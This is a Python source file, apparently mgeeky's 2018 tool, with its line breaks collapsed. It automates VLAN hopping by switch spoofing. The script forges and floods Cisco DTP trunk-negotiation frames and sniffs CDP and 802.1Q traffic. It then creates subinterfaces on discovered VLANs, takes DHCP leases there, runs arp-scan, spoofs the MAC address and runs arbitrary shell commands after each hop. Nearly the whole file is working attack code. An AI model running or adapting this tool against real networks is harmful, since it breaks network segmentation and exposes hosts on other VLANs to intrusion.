#!/usr/bin/python # # This script is performing DTP Trunk mode detection and VLAN Hopping # attack automatically, running sniffer afterwards to collect any other # VLAN available. # # To be launched only in Unix/Linux environment as the script utilizes # following applications: # - 8021q.ko # - vconfig # - ifconfig / ip / route # - dhclient # - (optional) arp-scan # # Python requirements: # - scapy # # NOTICE: # This program uses code written by 'floodlight', which comes from here: # https://github.com/floodlight/oftest/blob/master/src/python/oftest/afpacket.py # # TODO: # - Add logic that falls back to static IP address setup when DHCP fails # - Possibly implement custom ARP/ICMP/DHCP spoofers or launch ettercap # - Add auto-packets capture functionality via tshark/tcpdump to specified out directory # - Add functionality to auto-scan via arp-scan desired network # # Mariusz B. / mgeeky, '18, # import os import re import sys import socket import struct import textwrap import argparse import tempfile import commands import threading import subprocess import fcntl, socket, struct from ctypes import * try: from scapy.all import * except ImportError: print('[!] Scapy required: pip install scapy') sys.exit(1) VERSION = '0.4' config = { 'verbose' : False, 'debug' : False, 'force' : False, 'count' : 10, 'timeout' : 90, 'analyse' : False, 'interface' : '', 'macaddr' : '', 'inet' : '', 'origmacaddr' : '', 'commands' : [], 'exitcommands' : [], } arpScanAvailable = False stopThreads = False attackEngaged = False dot1qSnifferStarted = False vlansDiscovered = set() vlansHopped = set() vlansLeases = {} subinterfaces = set() cdpsCollected = set() tempfiles = [] # # =============================================== # Floodlight's afpacket definitions # ETH_P_8021Q = 0x8100 SOL_PACKET = 263 PACKET_AUXDATA = 8 TP_STATUS_VLAN_VALID = 1 << 4 class struct_iovec(Structure): _fields_ = [ ("iov_base", c_void_p), ("iov_len", c_size_t), ] class struct_msghdr(Structure): _fields_ = [ ("msg_name", c_void_p), ("msg_namelen", c_uint32), ("msg_iov", POINTER(struct_iovec)), ("msg_iovlen", c_size_t), ("msg_control", c_void_p), ("msg_controllen", c_size_t), ("msg_flags", c_int), ] class struct_cmsghdr(Structure): _fields_ = [ ("cmsg_len", c_size_t), ("cmsg_level", c_int), ("cmsg_type", c_int), ] class struct_tpacket_auxdata(Structure): _fields_ = [ ("tp_status", c_uint), ("tp_len", c_uint), ("tp_snaplen", c_uint), ("tp_mac", c_ushort), ("tp_net", c_ushort), ("tp_vlan_tci", c_ushort), ("tp_padding", c_ushort), ] libc = CDLL("libc.so.6") recvmsg = libc.recvmsg recvmsg.argtypes = [c_int, POINTER(struct_msghdr), c_int] recvmsg.retype = c_int def enable_auxdata(sk): """ Ask the kernel to return the VLAN tag in a control message Must be called on the socket before afpacket.recv. """ sk.setsockopt(SOL_PACKET, PACKET_AUXDATA, 1) def recv(sk, bufsize): """ Receive a packet from an AF_PACKET socket @sk Socket @bufsize Maximum packet size """ buf = create_string_buffer(bufsize) ctrl_bufsize = sizeof(struct_cmsghdr) + sizeof(struct_tpacket_auxdata) + sizeof(c_size_t) ctrl_buf = create_string_buffer(ctrl_bufsize) iov = struct_iovec() iov.iov_base = cast(buf, c_void_p) iov.iov_len = bufsize msghdr = struct_msghdr() msghdr.msg_name = None msghdr.msg_namelen = 0 msghdr.msg_iov = pointer(iov) msghdr.msg_iovlen = 1 msghdr.msg_control = cast(ctrl_buf, c_void_p) msghdr.msg_controllen = ctrl_bufsize msghdr.msg_flags = 0 rv = recvmsg(sk.fileno(), byref(msghdr), 0) if rv < 0: raise RuntimeError("recvmsg failed: rv=%d", rv) # The kernel only delivers control messages we ask for. We # only enabled PACKET_AUXDATA, so we can assume it's the # only control message. assert msghdr.msg_controllen >= sizeof(struct_cmsghdr) cmsghdr = struct_cmsghdr.from_buffer(ctrl_buf) # pylint: disable=E1101 assert cmsghdr.cmsg_level == SOL_PACKET assert cmsghdr.cmsg_type == PACKET_AUXDATA auxdata = struct_tpacket_auxdata.from_buffer(ctrl_buf, sizeof(struct_cmsghdr)) # pylint: disable=E1101 if auxdata.tp_vlan_tci != 0 or auxdata.tp_status & TP_STATUS_VLAN_VALID: # Insert VLAN tag tag = struct.pack("!HH", ETH_P_8021Q, auxdata.tp_vlan_tci) return buf.raw[:12] + tag + buf.raw[12:rv] else: return buf.raw[:rv] # # =============================================== # class Logger: @staticmethod def _out(x): if config['debug'] or config['verbose']: sys.stdout.write(x + '\n') @staticmethod def dbg(x): if config['debug']: sys.stdout.write('[dbg] ' + x + '\n') @staticmethod def out(x): Logger._out('[.] ' + x) @staticmethod def info(x): Logger._out('[?] ' + x) @staticmethod def err(x): sys.stdout.write('[!] ' + x + '\n') @staticmethod def fail(x): Logger._out('[-] ' + x) @staticmethod def ok(x): Logger._out('[+] ' + x) def inspectPacket(dtp): tlvs = dtp['DTP'].tlvlist stat = -1 for tlv in tlvs: if tlv.type == 2: stat = ord(tlv.status) break ret = True if stat == -1: Logger.fail('Something went wrong: Got invalid DTP packet.') ret = False elif stat == 2: Logger.fail('DTP disabled, Switchport in Access mode configuration') print('[!] VLAN Hopping is not possible.') ret = False elif stat == 3: Logger.ok('DTP enabled, Switchport in default configuration') print('[+] VLAN Hopping is possible.') elif stat == 4 or stat == 0x84: Logger.ok('DTP enabled, Switchport in Dynamic Auto configuration') print('[+] VLAN Hopping is possible.') elif stat == 0x83: Logger.ok('DTP enabled, Switchport in Trunk/Desirable configuration') print('[+] VLAN Hopping is possible.') elif stat == 0x81: Logger.ok('DTP enabled, Switchport in Trunk configuration') print('[+] VLAN Hopping IS possible.') elif stat == 0xa5: Logger.info('DTP enabled, Switchport in Trunk with 802.1Q encapsulation forced configuration') print('[?] VLAN Hopping may be possible.') elif stat == 0x42: Logger.info('DTP enabled, Switchport in Trunk with ISL encapsulation forced configuration') print('[?] VLAN Hopping may be possible.') else: Logger.info('Unknown DTP packet.') Logger.dbg(dtp.show()) ret = False if ret: print('\n[>] After Hopping to other VLANs - leave this program running to maintain connections.') return ret def floodTrunkingRequests(): while not stopThreads: # Ethernet dot3 = Dot3(src = config['macaddr'], dst = '01:00:0c:cc:cc:cc', len = 42) # Logical-Link Control llc = LLC(dsap = 0xaa, ssap = 0xaa, ctrl = 3) # OUT = Cisco, Code = DTP snap = SNAP(OUI = 0x0c, code = 0x2004) # DTP, Status = Access/Desirable (3), Type: Trunk (3) dtp = DTP(ver = 1, tlvlist = [ DTPDomain(length = 13, type = 1, domain = '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'), DTPStatus(status = '\\x03', length = 5, type = 2), DTPType(length = 5, type = 3, dtptype = '\\xa5'), DTPNeighbor(type = 4, neighbor = config['macaddr'], len = 10) ]) frame = dot3 / llc / snap / dtp Logger.dbg('SENT: DTP Trunk Keep-Alive:\n{}'.format(frame.summary())) send(frame, iface = config['interface'], verbose = False) time.sleep(config['timeout'] / 3) def engageDot1qSniffer(): global dot1qSnifferStarted if dot1qSnifferStarted: return dot1qSnifferStarted = True #Logger.info('Started VLAN/802.1Q sniffer.') sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW) sock.bind((config['interface'], ETH_P_ALL)) enable_auxdata(sock) print('[>] Discovering new VLANs...') while not stopThreads: buf = recv(sock, 65535) pkt = Ether(buf) if pkt.haslayer(Dot1Q): dot1q = pkt.vlan if dot1q not in vlansDiscovered: print('==> VLAN discovered: {}'.format(dot1q)) vlansDiscovered.add(dot1q) if not config['analyse']: t = threading.Thread(target = addVlanIface, args = (dot1q, )) t.daemon = True t.start() else: Logger.info('Analysis mode: Did not go any further.') Logger.info('Stopped VLAN/802.1Q sniffer.') def processDtps(dtps): global attackEngaged if stopThreads: return if attackEngaged == False: success = False for dtp in dtps: if dtp.haslayer(DTP): if inspectPacket(dtp): success = True break if success: #Logger.ok('VLAN Hopping via Switch Spoofing may be possible.') Logger.dbg('Flooding with fake Access/Desirable DTP frames...\n') t = threading.Thread(target = floodTrunkingRequests) t.daemon = True t.start() attackEngaged = True time.sleep(5) if config['force']: Logger.ok('FORCED VLAN Hopping via Switch Spoofing.') Logger.ok('Flooding with fake Access/Desirable DTP frames...\n') t = threading.Thread(target = floodTrunkingRequests) t.daemon = True t.start() attackEngaged = True time.sleep(5) if attackEngaged: engageDot1qSniffer() def launchCommand(subif, cmd, forceOut = False, noCmd = False): # following placeholders in command: # $GW (gateway), # $MASK (full mask), Logger.dbg('Subinterface: {}, Parsing command: "{}"'.format(subif, cmd)) if '%IFACE' in cmd: cmd = cmd.replace('%IFACE', subif) if '%HWADDR' in cmd: cmd = cmd.replace('%HWADDR', getHwAddr(subif)) if '%IP' in cmd: cmd = cmd.replace('%IP', getIfaceIP(subif)) if '%NET' in cmd: cmd = cmd.replace('%NET', shell("route -n | grep " + subif + " | grep -v UG | awk '{print $1}' | head -1")) if '%MASK' in cmd: cmd = cmd.replace('%MASK', shell("route -n | grep " + subif + " | grep -v UG | awk '{print $3}' | head -1")) if '%GW' in cmd: cmd = cmd.replace('%GW', shell("route -n | grep " + subif + " | grep UG | awk '{print $2}' | head -1")) if '%CIDR' in cmd: cmd = cmd.replace('%CIDR', '/' + shell("ip addr show " + subif + " | grep 'inet ' | awk '{print $2}' | cut -d/ -f2")) cmd = cmd.strip() if not noCmd: print('[>] Launching command: "{}"'.format(cmd)) out = shell(cmd) if forceOut: print('\n' + '.' * 50) print(out) print('.' * 50 + '\n') else: Logger.info(out) def launchCommands(subif, commands, forceOut = False, noCmd = False): for cmd in commands: launchCommand(subif, cmd, forceOut, noCmd) def addVlanIface(vlan): global subinterfaces global vlansLeases global tempfiles subif = '{}.{}'.format(config['interface'], vlan) if subif in subinterfaces: Logger.fail('Already created that subinterface: {}'.format(subif)) return Logger.dbg('Creating new VLAN Subinterface for {}.'.format(vlan)) out = shell('vconfig add {} {}'.format( config['interface'], vlan )) if out.startswith('Added VLAN with VID == {}'.format(vlan)): subinterfaces.add(subif) pidFile = tempfile.NamedTemporaryFile().name dbFile = tempfile.NamedTemporaryFile().name tempfiles.append(pidFile) tempfiles.append(dbFile) Logger.dbg('So far so good, subinterface {} added.'.format(subif)) ret = False for attempt in range(2): Logger.dbg('Acquiring DHCP lease for {}'.format(subif)) shell('dhclient -lf {} -pf {} -r {}'.format(dbFile, pidFile, subif)) time.sleep(3) if attempt > 0: shell('dhclient -lf {} -pf {} -x {}'.format(dbFile, pidFile, subif)) time.sleep(3) shell('dhclient -lf {} -pf {} {}'.format(dbFile, pidFile, subif)) time.sleep(3) ip = getIfaceIP(subif) if ip: Logger.dbg('Subinterface obtained IP: {}'.format(ip)) ret = True vlansHopped.add(vlan) vlansLeases[vlan] = ( ip, shell("route -n | grep " + subif + " | grep -v UG | awk '{print $1}' | head -1"), shell("ip addr show " + subif + " | grep 'inet ' | awk '{print $2}' | cut -d/ -f2") ) print('[+] Hopped to VLAN {}.: {}, subnet: {}/{}'.format( vlan, vlansLeases[vlan][0], vlansLeases[vlan][1], vlansLeases[vlan][2] )) launchCommands(subif, config['commands']) if arpScanAvailable: Logger.info('ARP Scanning connected subnet.') print('[>] Other hosts in hopped subnet: ') launchCommand(subif, "arp-scan -x -g --vlan={} -I %IFACE %NET%CIDR".format(vlan), True, True) break else: Logger.dbg('Subinterface {} did not receive DHCPOFFER.'.format( subif )) time.sleep(5) if not ret: Logger.fail('Could not acquire DHCP lease for: {}. Skipping.'.format(subif)) else: Logger.fail('Failed.: "{}"'.format(out)) def addVlansFromCdp(vlans): while not attackEngaged: time.sleep(3) if stopThreads: return for vlan in vlans: Logger.info('Trying to hop to VLAN discovered in CDP packet: {}'.format( vlan )) t = threading.Thread(target = addVlanIface, args = (vlan, )) t.daemon = True t.start() vlansDiscovered.add(vlan) def processCdp(pkt): global cdpsCollected global vlansDiscovered if not Dot3 in pkt or not pkt.dst == '01:00:0c:cc:cc:cc': return if not hasattr(pkt, 'msg'): return tlvs = { 1: 'Device Hostname', 2: 'Addresses', 3: 'Port ID', 4: 'Capabilities', 5: 'Software Version', 6: 'Software Platform', 9: 'VTP Management Domain', 10:'Native VLAN', 14:'VoIP VLAN', 22:'Management Address', } vlans = set() out = '' for tlv in pkt.msg: if tlv.type in tlvs.keys(): fmt = '' key = ' {}:'.format(tlvs[tlv.type]) key = key.ljust(25) if hasattr(tlv, 'val'): fmt = tlv.val elif hasattr(tlv, 'iface'): fmt = tlv.iface elif hasattr(tlv, 'cap'): caps = [] if tlv.cap & (2**0) != 0: caps.append("Router") if tlv.cap & (2**1) != 0: caps.append("TransparentBridge") if tlv.cap & (2**2) != 0: caps.append("SourceRouteBridge") if tlv.cap & (2**3) != 0: caps.append("Switch") if tlv.cap & (2**4) != 0: caps.append("Host") if tlv.cap & (2**5) != 0: caps.append("IGMPCapable") if tlv.cap & (2**6) != 0: caps.append("Repeater") fmt = '+'.join(caps) elif hasattr(tlv, 'vlan'): fmt = str(tlv.vlan) vlans.add(tlv.vlan) elif hasattr(tlv, 'addr'): for i in range(tlv.naddr): addr = tlv.addr[i].addr fmt += '{}, '.format(addr) wrapper = textwrap.TextWrapper( initial_indent = key, width = 80, subsequent_indent = ' ' * len(key) ) out += '{}\n'.format(wrapper.fill(fmt)) out = re.sub(r'(?:\n)+', '\n', out) if not out in cdpsCollected: cdpsCollected.add(out) print('\n[+] Discovered new CDP aware device:\n{}'.format(out)) if not config['analyse']: t = threading.Thread(target = addVlansFromCdp, args = (vlans, )) t.daemon = True t.start() else: Logger.info('Analysis mode: Did not go any further.') def packetCallback(pkt): Logger.dbg('RECV: ' + pkt.summary()) if Dot3 in pkt and pkt.dst == '01:00:0c:cc:cc:cc': processCdp(pkt) def sniffThread(): global vlansDiscovered warnOnce = False Logger.info('Sniffing for CDP/DTP frames (Max count: {}, Max timeout: {} seconds)...'.format( config['count'], config['timeout'] )) while not stopThreads and not attackEngaged: dtps = [] try: dtps = sniff( count = config['count'], filter = 'ether[20:2] == 0x2004 or ether[20:2] == 0x2000', timeout = config['timeout'], prn = packetCallback, stop_filter = lambda x: x.haslayer(DTP) or stopThreads, iface = config['interface'] ) except Exception as e: if 'Network is down' in str(e): break Logger.err('Exception occured during sniffing: ' + str(e)) if len(dtps) == 0 and not warnOnce: Logger.fail('It seems like there was no DTP frames transmitted.') Logger.fail('VLAN Hopping may not be possible (unless Switch is in Non-negotiate state):') Logger.info('\tSWITCH(config-if)# switchport nonnegotiate\t/ or / ') Logger.info('\tSWITCH(config-if)# switchport mode access\n') warnOnce = True if len(dtps) > 0 or config['force']: if len(dtps) > 0: Logger.dbg('Got {} DTP frames.\n'.format( len(dtps) )) else: Logger.info('Forced mode: Beginning attack blindly.') t = threading.Thread(target = processDtps, args = (dtps, )) t.daemon = True t.start() Logger.dbg('Stopped sniffing.') def getHwAddr(ifname): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15])) return ':'.join(['%02x' % ord(char) for char in info[18:24]]) def getIfaceIP(iface): out = shell("ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1") Logger.dbg('Interface: {} has IP: {}'.format(iface, out)) return out def changeMacAddress(iface, mac): old = getHwAddr(iface) print('[>] Changing MAC address of interface {}, from: {} to: {}'.format( iface, old, mac )) shell('ifconfig {} down'.format(iface)) shell('ifconfig {} hw ether {}'.format(iface, mac)) shell('ifconfig {} up'.format(iface)) ret = old != getHwAddr(iface) if ret: Logger.dbg('Changed.') else: Logger.dbg('Not changed.') return ret def assure8021qCapabilities(): if ('not found' in shell('modprobe -n 8021q')): Logger.err('There is no kernel module named: "8021q". Fatal error.') return False if not shell('which vconfig'): Logger.err('There is no "vconfig" utility. Package required: "vconfig". Fatal error.') return False shell('modprobe 8021q') return True def shell(cmd): out = commands.getstatusoutput(cmd)[1] Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out)) return out def selectDefaultInterface(): global config commands = { 'ip' : "ip route show | grep default | awk '{print $5}' | head -1", 'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1", } for k, v in commands.items(): out = shell(v) if len(out) > 0: Logger.info('Default interface lookup command returned:\n{}'.format(out)) config['interface'] = out return out return '' def cleanup(): if config['origmacaddr'] != config['macaddr']: Logger.dbg('Restoring original MAC address...') changeMacAddress(config['interface'], config['origmacaddr']) for subif in subinterfaces: Logger.dbg('Removing subinterface: {}'.format(subif)) launchCommands(subif, config['exitcommands']) shell('vconfig rem {}'.format(subif)) Logger.dbg('Removing temporary files...') for file in tempfiles: os.remove(file) def parseOptions(argv): print(''' :: VLAN Hopping via DTP Trunk negotiation Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique Mariusz B. / mgeeky '18, v{} '''.format(VERSION)) parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]') parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.') parser.add_argument('-e', '--execute', dest='command', metavar='CMD', default=[], action='append', help='Launch specified command after hopping to new VLAN. One can use one of following placeholders in command: %%IFACE (choosen interface), %%IP (acquired IP), %%NET (net address), %%HWADDR (MAC), %%GW (gateway), %%MASK (full mask), %%CIDR (short mask). For instance: -e "arp-scan -I %%IFACE %%NET%%CIDR". May be repeated for more commands. The command will be launched SYNCHRONOUSLY, meaning - one have to append "&" at the end to make the script go along.') parser.add_argument('-E', '--exit-execute', dest='exitcommand', metavar='CMD', default=[], action='append', help='Launch specified command at the end of this script (during cleanup phase).') parser.add_argument('-m', '--mac-address', metavar='HWADDR', dest='mac', default='', help='Changes MAC address of the interface before and after attack.') #parser.add_argument('-O', '--outdir', metavar='DIR', dest='outdir', default='', help='If set, enables packet capture on interface connected to VLAN Hopped network and stores in specified output directory *.pcap files.') parser.add_argument('-f', '--force', action='store_true', help='Attempt VLAN Hopping even if DTP was not detected (like in Nonegotiate situation).') parser.add_argument('-a', '--analyse', action='store_true', help='Analyse mode: do not create subinterfaces, don\'t ask for DHCP leases.') parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.') parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.') args = parser.parse_args() config['verbose'] = args.verbose config['debug'] = args.debug config['analyse'] = args.analyse config['force'] = args.force config['interface'] = args.interface config['commands'] = args.command config['exitcommands'] = args.exitcommand if args.force: config['timeout'] = 30 return args def printStats(): print('\n' + '-' * 80) print('\tSTATISTICS\n') print('[VLANS HOPPED]') if len(vlansHopped): print('Successfully hopped (and got DHCP lease) to following VLANs ({}):'.format( len(vlansHopped) )) for vlan, net in vlansLeases.items(): print('- VLAN {}: {}, subnet: {}/{}'.format(vlan, net[0], net[1], net[2] )) else: print('Did not hop into any VLAN.') print('\n[VLANS DISCOVERED]') if len(vlansDiscovered): print('Discovered following VLANs ({}):'.format( len(vlansDiscovered) )) for vlan in vlansDiscovered: print('- VLAN {}'.format(vlan)) else: print('No VLANs discovered.') print('\n[CDP DEVICES]') if len(cdpsCollected): print('Discovered following CDP aware devices ({}):'.format( len(cdpsCollected) )) for dev in cdpsCollected: print(dev + '\n') else: print('No CDP aware devices discovered.') def main(argv): global config global stopThreads global arpScanAvailable opts = parseOptions(argv) if not opts: Logger.err('Options parsing failed.') return False if os.getuid() != 0: Logger.err('This program must be run as root.') return False load_contrib('dtp') load_contrib('cdp') if not assure8021qCapabilities(): Logger.err('Unable to proceed.') return False if not opts.interface: if not selectDefaultInterface(): Logger.err('Could not find suitable interface. Please specify it.') return False print('[>] Interface to work on: "{}"'.format(config['interface'])) config['origmacaddr'] = config['macaddr'] = getHwAddr(config['interface']) if not config['macaddr']: Logger.err('Could not acquire MAC address of interface: "{}"'.format( config['interface'] )) return False else: Logger.dbg('Interface "{}" has MAC address: "{}"'.format( config['interface'], config['macaddr'] )) config['inet'] = getIfaceIP(config['interface']) if not config['inet']: Logger.fail('Could not acquire interface\'s IP address! Proceeding...') oldMac = config['macaddr'] if opts.mac: oldMac = changeMacAddress(config['interface'], opts.mac) if oldMac: config['macaddr'] = opts.mac else: Logger.err('Could not change interface\'s MAC address!') return False if shell("which arp-scan") != '': arpScanAvailable = True else: Logger.err('arp-scan not available: will not perform scanning after hopping.') t = threading.Thread(target = sniffThread) t.daemon = True t.start() try: while True: pass except KeyboardInterrupt: print('\n[>] Cleaning up...') stopThreads = True time.sleep(3) cleanup() printStats() return True if __name__ == '__main__': main(sys.argv)